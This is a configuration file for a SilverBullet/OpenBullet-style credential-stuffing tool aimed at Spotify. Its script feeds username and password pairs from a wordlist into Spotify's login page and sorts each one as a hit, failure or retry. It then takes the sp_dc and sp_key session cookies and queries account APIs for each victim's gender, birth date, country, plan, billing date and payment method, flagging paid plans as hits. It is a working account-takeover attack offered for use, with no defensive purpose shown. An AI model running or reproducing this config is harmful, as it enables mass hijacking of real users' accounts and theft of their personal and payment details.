[SETTINGS]
{
  "Name": "Spotify",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-07-25T20:08:45.6243867+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Aneek",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Spotify",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION Quit 

BROWSERACTION ClearCookies 

BROWSERACTION Open 

NAVIGATE "https://accounts.spotify.com/en/login?continue=https%3A%2F%2Fopen.spotify.com%2F" 

ELEMENTACTION XPath "//*[@id=\"login-username\"]" 
  WaitForElement 

ELEMENTACTION XPath "//*[@id=\"login-password\"]" 
  WaitForElement 

ELEMENTACTION XPath "//*[@id=\"login-button\"]/div[1]" 
  WaitForElement 

ELEMENTACTION XPath "//*[@id=\"login-username\"]" 
  SendKeysHuman "<USER>" 

ELEMENTACTION XPath "//*[@id=\"login-password\"]" 
  SendKeysHuman "<PASS>" 

ELEMENTACTION XPath "//*[@id=\"login-button\"]" 
  Click 

ELEMENTACTION Id "" 
  WaitForElement 

BROWSERACTION DOMtoSOURCE "<SOURCE>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "correlationId" 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or password." 
  KEYCHAIN Retry OR 
    KEY "Oops! Something went wrong," 

BROWSERACTION GetCookies "<COOKIES>" 

BROWSERACTION Quit 

#sp_dc PARSE "<COOKIES(sp_dc)>" LR "" "" -> VAR "spdc" 

#sp_key PARSE "<COOKIES(sp_key)>" LR "" "" -> VAR "key" 

REQUEST GET "https://www.spotify.com/api/account-settings/v1/profile" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Content-Type: application/json" 
  HEADER "Cookie: sp_m=in-en; sp_t=c61e15c9-83dd-452b-89e6-078a1b51cd61; sp_gaid=0088fce8b46445f7edb2aa406d63ce3da02320fea560a5c7b0756c; _gcl_au=1.1.1302338628.1702974193; sp_adid=fa920616-bf58-42f5-8373-6c5d5a56a71e; sp_last_utm=%7B%22utm_campaign%22%3A%22your_account%22%2C%22utm_medium%22%3A%22menu%22%2C%22utm_source%22%3A%22spotify%22%7D; _ga_ZWG1NSHWD8=GS1.1.1702974193.1.1.1702974944.0.0.0; _ga=GA1.2.95253534.1702974194; _cs_c=0; _cs_id=ffcb5c06-d9fd-a17c-f843-d0b09a2c884c.1702974945.1.1702974945.1702974945.1.1737138945334; _scid=affdae0e-cdd2-4c14-9e62-601083c2895c; _scid_r=affdae0e-cdd2-4c14-9e62-601083c2895c; _sctr=1%7C1702924200000; _ga_S35RN5WNT2=GS1.1.1702974945.1.1.1702975458.0.0.0; sp_dc=<spdc>; sp_key=<key>; sp_landing=https%3A%2F%2Fopen.spotify.com%2F%3Fsp_cid%3Dc61e15c9-83dd-452b-89e6-078a1b51cd61%26device%3Ddesktop; payment-sdk-locales=en_IN%2Cen; OptanonConsent=isGpcEnabled=0&datestamp=Mon+Jan+01+2024+02%3A42%3A02+GMT%2B0530+(India+Standard+Time)&version=202309.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=NotLandingPage&groups=s00%3A1%2Cf00%3A1%2Cm00%3A1%2Ct00%3A1%2Ci00%3A1%2Cf11%3A1%2Cm03%3A1&AwaitingReconsent=false; __Host-sp_csrf_sid=<sid>" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.spotify.com/in-en/account/profile/" 
  HEADER "Sec-Ch-Ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "X-Csrf-Token: <csrf>" 

#Gen PARSE "<SOURCE>" JSON "gender" -> VAR "gen" 

#Gender FUNCTION Translate 
  KEY "MALE" VALUE "Male" 
  KEY "FEMALE" VALUE "Female" 
  "<gen>" -> CAP "Gender" 

#Birth_Date PARSE "<SOURCE>" JSON "birthdate" CreateEmpty=FALSE -> CAP "Birth Date" 

#Country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

REQUEST GET "https://www.spotify.com/in-en/api/account/v2/plan/" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Cookie: sp_m=in-en; sp_t=c61e15c9-83dd-452b-89e6-078a1b51cd61; sp_gaid=0088fce8b46445f7edb2aa406d63ce3da02320fea560a5c7b0756c; _gcl_au=1.1.1302338628.1702974193; sp_adid=fa920616-bf58-42f5-8373-6c5d5a56a71e; sp_last_utm=%7B%22utm_campaign%22%3A%22your_account%22%2C%22utm_medium%22%3A%22menu%22%2C%22utm_source%22%3A%22spotify%22%7D; _ga_ZWG1NSHWD8=GS1.1.1702974193.1.1.1702974944.0.0.0; _ga=GA1.2.95253534.1702974194; _cs_c=0; _cs_id=ffcb5c06-d9fd-a17c-f843-d0b09a2c884c.1702974945.1.1702974945.1702974945.1.1737138945334; _scid=affdae0e-cdd2-4c14-9e62-601083c2895c; _scid_r=affdae0e-cdd2-4c14-9e62-601083c2895c; _sctr=1%7C1702924200000; _ga_S35RN5WNT2=GS1.1.1702974945.1.1.1702975458.0.0.0; sp_dc=<spdc>; sp_key=<spkey>; sp_landing=https%3A%2F%2Fopen.spotify.com%2F%3Fsp_cid%3Dc61e15c9-83dd-452b-89e6-078a1b51cd61%26device%3Ddesktop; __Host-sp_csrf_sid=<sid>; OptanonConsent=isGpcEnabled=0&datestamp=Mon+Jan+01+2024+02%3A28%3A21+GMT%2B0530+(India+Standard+Time)&version=202309.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=NotLandingPage&groups=s00%3A1%2Cf00%3A1%2Cm00%3A1%2Ct00%3A1%2Ci00%3A1%2Cf11%3A1%2Cm03%3A1&AwaitingReconsent=false" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.spotify.com/in-en/account/manage-your-plan/" 
  HEADER "Sec-Ch-Ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 

#Plan_Type PARSE "<SOURCE>" LR "\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "Plan Type" 

#Plan_Price PARSE "<SOURCE>" LR "Your next bill is for <b class=\\\"recurring-price\\\">" "<" CreateEmpty=FALSE -> CAP "Plan Price" 

#Next_Billing_Date PARSE "<SOURCE>" LR "on <b class=\\\"recurring-date\\\">" "</b>" CreateEmpty=FALSE -> CAP "Next Billing Date" 

#Payment_Method PARSE "<SOURCE>" LR "\"paymentMethod\":{\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "Payment Method" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Plan Type>" Contains "Student" 
    KEY "<Plan Type>" Contains "Hulu" 
    KEY "<Plan Type>" Contains "Duo" 
    KEY "<Plan Type>" Contains "Sub" 
    KEY "<Plan Type>" Contains "Family" 
    KEY "<Plan Type>" Contains "Master" 
    KEY "<Plan Type>" Contains "Premium" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Plan Type>" Contains "Free" 
